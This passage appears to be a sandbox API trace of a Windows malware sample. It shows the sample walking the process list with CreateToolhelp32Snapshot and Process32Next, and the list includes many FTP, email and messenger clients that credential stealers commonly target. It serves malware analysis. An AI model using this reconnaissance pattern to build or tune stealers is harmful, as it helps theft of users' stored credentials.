(hObject=0x1bf8) returned 1 [0149.778] Sleep (dwMilliseconds=0x64) [0149.896] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bf8 [0149.923] Process32First (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.926] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0149.928] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0149.931] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.933] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0149.935] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.937] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0149.940] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0149.942] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0149.959] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.962] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.965] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0149.967] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.969] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.972] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.974] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.976] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.979] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.981] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.985] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0149.987] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0149.989] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0149.991] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0149.994] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.008] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0150.010] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0150.012] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0150.014] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0150.017] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0150.020] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0150.042] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.044] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0150.047] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0150.049] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0150.051] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0150.053] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.055] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0150.057] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0150.060] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0150.089] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0150.092] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0150.094] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0150.096] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0150.099] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0150.101] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0150.103] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0150.106] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0150.108] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0150.110] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0150.112] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0150.115] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0150.118] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0150.120] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0150.122] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0150.124] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0150.130] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0150.132] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0150.135] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0150.138] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0150.141] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0150.144] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0150.146] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0150.149] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0150.152] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0150.155] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0150.157] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0150.160] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0150.163] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0150.191] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0150.194] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0150.197] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0150.199] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0150.202] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0150.205] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0150.207] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0150.210] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0150.212] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0150.214] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0150.216] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0150.219] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0150.221] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0150.224] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0150.239] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0150.242] Process32Next (in: hSnapshot=0x1bf8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, 